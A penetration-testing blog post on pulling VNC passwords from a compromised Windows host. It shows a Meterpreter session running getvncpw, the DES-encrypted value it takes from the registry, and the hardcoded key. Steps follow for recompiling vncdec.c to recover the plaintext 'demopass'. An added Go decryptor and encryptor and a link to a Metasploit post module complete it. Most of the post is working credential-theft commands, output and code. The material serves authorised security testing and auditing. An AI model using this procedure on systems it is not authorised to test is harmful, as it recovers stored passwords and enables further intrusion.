inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
You're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887), and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
Change the relevant section:
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spat out 3290e903b5bf3769, so it becomes:
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
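The same decryption the two vncdec.c tools do, as an added example that is not the post's or either tool's code; Go is used because crypto/des ships in the standard library. It takes the value getvncpw printed and returns the password, and it includes the step a standard DES library needs that the C tools hide: VNC's d3des reads key bits in reverse order, so each byte of the fixed key must be bit-reversed. Function names are my own.

```go
package main

import "crypto/cipher"
import "crypto/des"
import "encoding/hex"
import "fmt"
import "strings"

// Fixed VNC key: the digit string quoted in the post, read as eight decimal bytes.
var vncKey = [8]byte{23, 82, 107, 6, 35, 78, 88, 7}

// vncCipher returns standard DES keyed with vncKey. VNC's d3des.c consumes key bits
// in the opposite order to standard DES, so each key byte is bit-reversed first.
func vncCipher() cipher.Block {
	key := make([]byte, 8)
	for i, b := range vncKey {
		for bit := 0; bit < 8; bit++ {
			key[i] = key[i]<<1 | (b>>bit)&1
		}
	}
	c, _ := des.NewCipher(key) // cannot fail: the key is always 8 bytes
	return c
}

// DecryptVNCPassword turns the 16-hex-digit registry value into the stored password:
// one DES-ECB block, no IV. Short passwords were zero-padded, so trailing NULs go.
func DecryptVNCPassword(hexValue string) (string, error) {
	raw, err := hex.DecodeString(strings.TrimSpace(hexValue))
	if err != nil || len(raw) != des.BlockSize {
		return "", fmt.Errorf("need 16 hex digits (8 bytes), got %q", hexValue)
	}
	plain := make([]byte, des.BlockSize)
	vncCipher().Decrypt(plain, raw)
	return strings.TrimRight(string(plain), "\x00"), nil
}

// EncryptVNCPassword is the inverse: the value VNC stores for a given password.
func EncryptVNCPassword(password string) string {
	plain := make([]byte, des.BlockSize)
	copy(plain, password) // truncates to 8 bytes, zero-pads shorter input
	out := make([]byte, des.BlockSize)
	vncCipher().Encrypt(out, plain)
	return hex.EncodeToString(out)
}

func main() {
	fmt.Println(DecryptVNCPassword("3290e903b5bf3769")) // value from the post
}
```

Because only eight bytes are ever encrypted, anything past the eighth character of a VNC password is silently dropped, which is worth knowing when auditing password policy on VNC hosts.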
I rewrote the script as a post module.
Info here:
http://www.room362.com/blog/2011/3/20/metasploit-vnc-password-extraction.html
Committed as of r12048
https://www.metasploit.com/redmine/projects/framework/repository/revisions/12048